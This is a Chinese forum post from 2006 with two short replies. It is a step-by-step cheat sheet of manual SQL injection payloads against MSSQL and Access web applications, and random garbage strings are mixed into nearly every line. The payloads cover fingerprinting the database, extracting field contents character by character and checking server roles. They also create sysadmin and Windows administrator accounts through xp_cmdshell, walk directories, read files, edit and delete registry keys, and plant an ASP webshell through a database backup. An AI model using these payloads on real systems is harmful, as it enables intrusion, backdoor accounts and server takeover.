社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3850阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 TyY[8J|  
  2.初步判断是否是mssql ;and user>0 RXP0 4  
(Eq0 |"cj  
  3.注入参数是字符'and [查询条件] and ''=' \Azl6`Em  
x00"d$!  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' %=xR$<D  
o$FqMRep  
  5.判断数据库系统 )q&=x2`  
s? @{  
  ;and (select count(*) from sysobjects)>0 mssql +R@5e+auQ.  
K'+GK S7.  
  ;and (select count(*) from msysobjects)>0 access *Em 9R  
[ Lt1OdGl  
Jtnuo]{R  
Uc/MPCqZ  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 'j6PL;~c  
?g+0S@{i $  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 8l-+ 4~mH  
WBFG_])  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 u>Z;/kr  
QKDY:1]  
  9.(1)猜字段的ascii值(access) HaXlc8  
>:!TfuU^R  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 8zS't2 u  
Ad xCP\S&  
  (2)猜字段的ascii值(mssql) !([Q1r{u  
$`W .9  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 U$@p"F@P  
WHk/Rg%<  
  10.测试权限结构(mssql) axW3#3#`  
rlqn39  
=/&ob%J)9]  
2s_shY<=}L  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- dVmI.A'nbp  
PsU.dv[  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 4h\MSTF*  
QijEb  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- QkBT, c  
 +ulBy  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- PdcF  
p&ytUT na  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- n|dLK.Q  
W|_ @ju  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Gnop  
!:PF |dZ  
  ;and 1=(select IS_MEMBER('db_owner'));-- O'{UAb+-  
( >zXapb2  
NTS tk{s,  
+h_'hz&HlS  
  11.添加mssql和系统的帐户 3YVG|Bc~_  
n0q5|ES  
  ;exec master.dbo.sp_addlogin username;-- 9oKRn c  
  ;exec master.dbo.sp_password null,username,password;-- JG @bl  
rT9<_<  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- uUu]JDdz  
*xR;}%s\  
  ;exec master.dbo.xp_cmdshell 'net user username password 4 :RL[;  
o6,$;-?F_  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- jE|Ju:}&  
7K>FC T  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- &;S.1tg  
Vb*q^ v  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- c-.t8X,5(~  
Z(Fsk4,  
pMnkh}Q#  
ac%%*HN,  
  12.(1)遍历目录 o<ak&LX`9  
e0Cr>I5/e  
  ;create table dirs(paths varchar(100), id int) mk.:V64 >;  
+a_eNl,  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' ":E 7#9  
mJe;BU"y]  
  ;and (select top 1 paths from dirs)>0 /{Ksi+q  
25]Mi2_  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) G{ ~pA4  
0 1<~~6A  
;S5*n:d  
h^h,4 H\r  
  (2)遍历目录 o?@,f/" 5  
~?4'{Hc'  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 4^vEMq8lB  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ;M}'\.  
ZnSDq_Uk  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 VZB T'N  
q'~ ?azg:  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 H~UxVQLPp  
Njsz=  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 >F+Mu-^  
?JO x9;`  
I) Y ^_&=  
,4wVQ(,?cd  
  13.mssql中的存储过程 CKwrE]h  
&.D3f"  
  xp_regenumvalues 注册表根键, 子键 MT9c:7}[&  
M7!>-P  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 %>B?WR\yE  
Hf!o6 o  
  xp_regread 根键,子键,键值名 Hv2t_QjKT  
T^.;yU_B?  
  ;exec xp_regread qD Z?iTHQq  
 Ht| No  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 YSERQo  
# 12  
  xp_regwrite 根键,子键, 值名, 值类型, 值 p.^glz>B  
]7 " W(  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 mpfc2>6Il.  
'7AlE!7%  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 KLD)h,]  
spter35b[  
  xp_regdeletevalue 根键,子键,值名 QSPneYD  
A.tONPi  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 j]th6  
|6/k2d{,(  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 A8 V7\  
_V\rs{ 5  
#T:#!MKa  
Y^DS~CrM  
  14.mssql的backup创建webshell d#E]>:w9  
o}H7;v8H  
  use model )jk X&7x  
8sb<$M$c  
  create table cmd(str image); #G2~#\  
??eSGQ|  
  insert into cmd(str) values (''); "`]G>,r_  
) *Mr{`  
  backup database model to disk='c:\l.asp'; |hms'n0  
K s 8  
G?D7R/0)  
l",JN.w  
  15.mssql内置函数 c ;_ T  
C-!!1-Eq?:  
  ;and (select @@version)>0 获得Windows的版本号 J60XUxf  
5u +U^D  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa 'q%56WAJ  
 pleLdGq  
  ;and (select user_name())>0 爆当前系统的连接用户 xL8r'gV@  
6[fpe  
  ;and (select db_name())>0 得到当前连接的数据库 xG:eS:iT  
l_bvwo  
9}p>='  
-4ityS @  
  16.简洁的webshell ^uB9EP*P  
?m.WqNBH7  
  use model IB9[Lx  
~\_aT2j0  
  create table cmd(str image); cojtQ D6  
7PQ03dtfg  
  insert into cmd(str) values (''); 9gP-//L@  
+>3XJlZV  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
温馨提示:欢迎交流讨论,请勿纯表情、纯引用!
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八